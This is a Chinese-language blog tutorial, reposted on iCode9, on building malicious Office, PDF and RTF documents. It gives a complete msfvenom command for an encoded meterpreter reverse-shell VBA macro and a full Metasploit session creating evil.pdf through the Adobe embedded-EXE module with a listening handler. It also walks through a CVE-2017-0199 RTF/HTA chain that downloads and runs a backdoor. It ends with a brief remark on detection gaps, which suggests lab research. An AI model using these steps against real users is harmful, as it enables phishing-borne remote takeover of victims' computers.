标签:文件 rtf 攻击 宏病毒 windows exploit exe pdf 制作
1. 恶意文件形式:基于宏
(1)落地形式
非PE的间接文件:A、基于宏(类型III:Offic文档、PDF文档)
(2)类型介绍
许多专业安全分析人员通过长期的跟踪分析,确认无文件的攻击其实是包含各种文件的。在这种情况下,攻击者提供恶意文件通常会作为电子邮件附件,用于以下其中一种目的:
a) 恶意文件可以充当其他文件的灵活容器。例如,攻击者可以在Microsoft Office文件中嵌入JavaScript文件,并对收件人进行社会工程攻击,当受害者打开嵌入的文件时,恶意文件就开始执行所带的脚本了。另外,可以携带恶意文件的其他文件类型包括PDF和RTF。由于此功能是特定应用程序才包含的一项功能,因此杀毒软件的技术通常不会干扰这些文件的使用。
b) 恶意文件可以携带执行恶意代码的漏洞:如今的文件功能越来越复杂,不过功能多的同时所包含的攻击面也就增大,比如攻击者可以利用诸如解析漏洞之类的漏洞。在这种情况下,攻击者就可以在受损应用程序的内存中触发捆绑的shellcode,执行攻击,即使不将代码保存到文件系统,攻击者也可以在发起攻击。
c) 文件可以执行传播过程中的恶意逻辑,如今的文件都支持强大的脚本功能,例如Microsoft Office执行VBA宏的功能。这些功能允许攻击者在没有编译可执行文件的情况下实现恶意逻辑,这就是利用了许多杀毒工具在区分恶意脚本和良性脚本方面的弱点。文件脚本功能包括启动程序和下载恶意代码。
(3)实例生成
a) Word宏病毒制作
MSF生成宏病毒
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xx.xx.xx.xx lport=4444 -f vba -o 123.vba
创建一个新word,点击菜单栏里的视图,查看宏中新建一个宏名:
复制粘贴vba文件代码:
保存为docm格式文件。
在msf上开启监听,靶机上点击生成的docm格式文件,成功反弹shell:
b) PDF病毒制作
环境:
攻击机:Kali
目标操作系统:Windows 10或Windows 7 (关闭防火墙和安全软件)
目标软件:Adobe Reader 8.1.2 (8.x 9.x 是版本范围)
生成恶意文件:(红色为指令输入)
msf6 > search adobe_pdf
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent No Adobe PDF Embedded EXE Social Engineering
1 exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript)
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options
Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME evil.pdf no The output filename.
INFILENAME /usr/share/metasp yes The Input PDF filename.
loit-framework/da
ta/exploits/CVE-2
010-1240/template
.pdf
LAUNCH_MESSAGE To view the encry no The message to display in t
pted content plea he File: area
se tick the "Do n
ot show this mess
age again" box an
d press Open.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST 172.16.54.128 yes The listen address (an interface ma
y be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows
Vista/7 (English)
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > run
[*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[+] Parsing Successful. Creating 'evil.pdf' file...
[+] evil.pdf stored at /root/.msf4/local/evil.pdf
开启端口监听
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST yes The listen address (an interface ma
y be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 172.16.54.128
LHOST => 172.16.54.128
msf6 exploit(multi/handler) > run
打开文件后,即被getshell:
c) RTF宏病毒制作
不法分子主要利用Office RTF漏洞传播相关后缀名为“.doc”的文件,但实际上这是一个RTF文件。因为Office的兼容性,文件可以正常打开,但在打开过程中存在漏洞。该漏洞可导致木马在不执行宏的情况下从网上下载并运行恶意程序,进而对受害者的电脑进行攻击。
漏洞利用:CVE-2017-0199
攻击载体: Microsoft Office RTF文档
受影响Office版本: Microsoft office 2016、2013、2010、2007。
利用该漏洞的攻击流程:
攻击方利用Office提供的OLE技术,将包含了恶意链接的URL Moniker(COM对象)嵌入RTF文档中,该恶意链接指向远程服务器中的恶意HTA文件。攻击方利用钓鱼邮件等方式诱使用户保存RTF文档到计算机中并打开,于是URL Moniker使winword.exe向恶意链接指向的地址发出HTTP请求,服务器返回一个带有嵌入式恶意代码的假RTF文件,并在HTTP响应头部添加键值对(Content-Type:application/hta),这使winword.exe以为这是一个HTA文件,于是通过COM对象查找处理hta文件的程序Microsoft HTA(mshta.exe),于是mshta.exe打开这个假RTF文件,自动加载并执行包含PowerShell命令的VB脚本。
样例生成:
首先,创建一个正常的word文档,作为将要链接的rtf对象,如命名为Qianli.docx
然后,将Qianli.docx重命名为Qianli.rtf
放到apache服务器上面:
并创建另一个文档,选择插入->对象->由文件创建,输入rtf文件路径后选择链接到文件。然后将该文件另存为rtf文件,此处命名为exp.rtf
此时,打开exp.rtf可以看到刚刚链接的Qianli.rtf是以一个整体的格式显示。
这时,我们在服务器端修改Qianli.rtf文件为Visual Script Script代码需要注意反斜杠的转义,这段代码将弹出本地计算器。
需要改一下Apache的配置,该代码会将该目录下的文件识别为hta脚本,然后重启服务器。
点击“是”即可弹出计算器
自动执行计算器程序:
后门准备
利用最metasploit生成meterpreter后门,放在与Qianli.rtf相同目录下。
下图,左图寻找相关payload,右图生成:
修改刚刚的Qianli.rtf,下载文件并执行:
msf监听本地4444端口,靶机运行rtf文件,即可反弹shell:
当前检测问题:
在本次word宏病毒与rtf宏病毒试验中,均在底层调用了rundll32
生成的告警也只是溯源到rundll32
并未指明是哪个宏病毒文件,无法进行进一步处理。需要在后面开发中增加该需求
标签:文件,rtf,攻击,宏病毒,windows,exploit,exe,pdf,制作 来源: https://www.cnblogs.com/bonelee/p/16284533.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。